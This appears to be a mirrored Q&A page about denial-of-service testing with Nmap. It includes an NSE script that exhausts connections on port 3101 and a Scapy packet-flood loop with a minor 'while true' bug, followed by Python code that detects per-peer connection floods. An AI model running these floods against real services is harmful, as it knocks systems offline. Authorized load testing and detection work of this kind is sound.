DOS (nmap) Scripts (Penetration Testing) [closed]
25-06-2021
Question
I need to perform a penetration test. I would like to get a script or some scripts together to attack and (hopefully not) bring down a certain port/software by flooding it. I have Nmap installed and an example script from a colleague. Could anybody explain the script to me and shine any light on how to adjust it to fit my needs?
description = [[
Connects to ports without disconnecting
]]
author =""
license = 'Same as Nmap--See http://nmap.org/book/man-legal.html'
categories = {'auth', 'intrusive'}
require('shortport')
require('stdnse')
require('strbuf')
require('math')
local soc
local catch = function() soc:close() end
local try = nmap.new_try(catch)
--portrule = shortport.port_or_service({3000, 3001, 3002, 3003, 3004, 3005,3006,3007,3008,3009, 3010, 3011, 4008, 3110}, 'client server')
--portrule = shortport.port_or_service({3000-4008}, 'client server')
portrule = shortport.port_or_service({3101}, 'client server')
action = function(host, port)
math.randomseed( os.time() )
local buff = ""
soc = nmap.new_socket()
soc:set_timeout(400000000)
for j = 1,1100 do
print(j)
try(soc:connect(host.ip, port.number, port.protocol))
--soc:close()
end
--print(math.random(255))
return ""
end
Answer
I'm not sure that this script is the best way to do things, but in order to run it, you should use this command:
nmap -p 3101 --script your-script-name target
You'll probably have better luck using a different tool than Nmap. For instance you could use Scapy:
$ sudo scapy
>>> p = IP(dst="192.168.1.X") / TCP(dport=3101)
>>> while true:
... p.sport = random.randint(1024,65535)
... send(p)
Other suggestions
http://nmap.org/book/nse-api.html
Try setting function(host='host url here', port='port number here')
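What a test like this looks like from the service side, as an added example that is not part of the original posts: a script that "connects to ports without disconnecting" shows up as one peer holding many connections to the service port. The code counts established and half-open connections per peer from text in the column layout of `ss -tan`; the addresses, the sample rows and the threshold of 25 are constructed assumptions.

```python
from collections import Counter

def build_sample():
    """Constructed rows in the column layout of `ss -tan` (not from a real host)."""
    rows = ["State Recv-Q Send-Q Local Address:Port Peer Address:Port"]
    # An ordinary client with two connections to the service on port 3101.
    rows += [f"ESTAB 0 0 10.0.0.5:3101 10.0.0.20:{40000 + i}" for i in range(2)]
    # One peer holding many connections open, plus some half-open ones.
    rows += [f"ESTAB 0 0 10.0.0.5:3101 10.0.0.66:{50000 + i}" for i in range(40)]
    rows += [f"SYN-RECV 0 0 10.0.0.5:3101 10.0.0.66:{51000 + i}" for i in range(10)]
    # Traffic to another port must not be counted.
    rows.append("ESTAB 0 0 10.0.0.5:22 10.0.0.66:60000")
    return "\n".join(rows)

def connections_per_peer(ss_text, service_port, states=("ESTAB", "SYN-RECV")):
    """Return Counter keyed by (peer_ip, state) for connections to service_port."""
    counts = Counter()
    for line in ss_text.splitlines():
        fields = line.split()
        # Skips the header, blank lines and states we are not interested in.
        if len(fields) < 5 or fields[0] not in states:
            continue
        local, peer = fields[3], fields[4]
        # rsplit keeps IPv6 literals such as [::1]:3101 intact.
        if local.rsplit(":", 1)[1] != str(service_port):
            continue
        counts[(peer.rsplit(":", 1)[0], fields[0])] += 1
    return counts

def flag_peers(counts, threshold):
    """Return peers whose total connection count reaches the threshold."""
    totals = Counter()
    for (peer, _state), n in counts.items():
        totals[peer] += n
    return sorted(peer for peer, n in totals.items() if n >= threshold)

if __name__ == "__main__":
    counts = connections_per_peer(build_sample(), 3101)
    for peer in flag_peers(counts, threshold=25):
        print(peer, "ESTAB:", counts[(peer, "ESTAB")],
              "SYN-RECV:", counts[(peer, "SYN-RECV")])
```

Running the same count before and during an authorized test gives a baseline for choosing a per-source connection limit on the service or firewall.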
Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow